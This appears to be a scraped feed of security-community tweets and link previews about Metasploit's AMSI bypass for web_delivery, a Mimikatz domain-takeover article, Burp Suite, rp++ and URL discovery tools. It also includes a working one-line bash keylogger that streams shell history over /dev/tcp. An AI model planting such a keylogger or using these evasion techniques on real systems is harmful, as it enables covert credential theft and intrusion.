One command to rule them all!
Just finished to update @metasploit web_delivery to automatically bypass AMSI/SBL with latest definitions.
Testing and feedbacks are welcome!
https://t.co/TSPr2mIcsc
https://t.co/R4d4wSIfpB
Test it with:
msfconsole -r web.rc
Just finished to update @metasploit web_delivery to automatically bypass AMSI/SBL with latest definitions.
Testing and feedbacks are welcome!
https://t.co/TSPr2mIcsc
https://t.co/R4d4wSIfpB
Test it with:
msfconsole -r web.rc
GitHub
Add support for AMSI/SBL bypass to PSH web_delivery by phra · Pull Request #12446 · rapid7/metasploit-framework
Related to rapid7/rex-powershell#17
Requires rapid7/rex-powershell#19
Verification
List the steps needed to make sure this thing works
Start msfconsole
use exploit/multi/script/web_delivery
set...
Requires rapid7/rex-powershell#19
Verification
List the steps needed to make sure this thing works
Start msfconsole
use exploit/multi/script/web_delivery
set...
I had fun with this one line bash keylogger today!
PROMPT_COMMAND='history -a; tail -n1 ~/.bash_history > /dev/tcp/127.0.0.1/9000'
PROMPT_COMMAND='history -a; tail -n1 ~/.bash_history > /dev/tcp/127.0.0.1/9000'
Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin
https://t.co/C7XachfASf
https://t.co/C7XachfASf
root@Hausec
Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin
In the previous two articles, I gathered local user credentials and escalated to local administrator, with my next step is getting to domain admin. Since I have local admin, I’ll be using a t…
Burp Suite Pro 2.1.05 released, with experimental support for using Burp's embedded Chromium browser to perform all navigation while scanning. This new approach will provide a robust basis for future capabilities. Feedback welcome if you want to play now.
https://t.co/UPYjGMibnE
https://t.co/UPYjGMibnE
releases.portswigger.net
Professional 2.1.05
This release adds experimental support for using Burp's embedded Chromium browser to perform all navigation while scanning. This new appr...
rp++ is a full-cpp written tool that aims to find ROP sequences in PE/Elf/Mach-O x86/x64 binaries. https://t.co/actBdnkcxQ
GitHub
GitHub - 0vercl0k/rp: rp++ is a fast C++ ROP gadget finder for PE/ELF/Mach-O x86/x64/ARM binaries.
rp++ is a fast C++ ROP gadget finder for PE/ELF/Mach-O x86/x64/ARM binaries. - GitHub - 0vercl0k/rp: rp++ is a fast C++ ROP gadget finder for PE/ELF/Mach-O x86/x64/ARM binaries.
getallurls - fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl:
https://t.co/34znlumYwM
Quick script that I use religiously for content discovery.
https://t.co/34znlumYwM
Quick script that I use religiously for content discovery.
GitHub
lc/hacks
Repo of useful scripts. Contribute to lc/hacks development by creating an account on GitHub.
So this filing in security research company CorelliumHQ vs Apple has some pretty interesting details. And it doesn't exactly look good for Apple. https://t.co/KNl2z3Uk8l
Google Docs
unredacted_Corellium_vs_Apple.pdf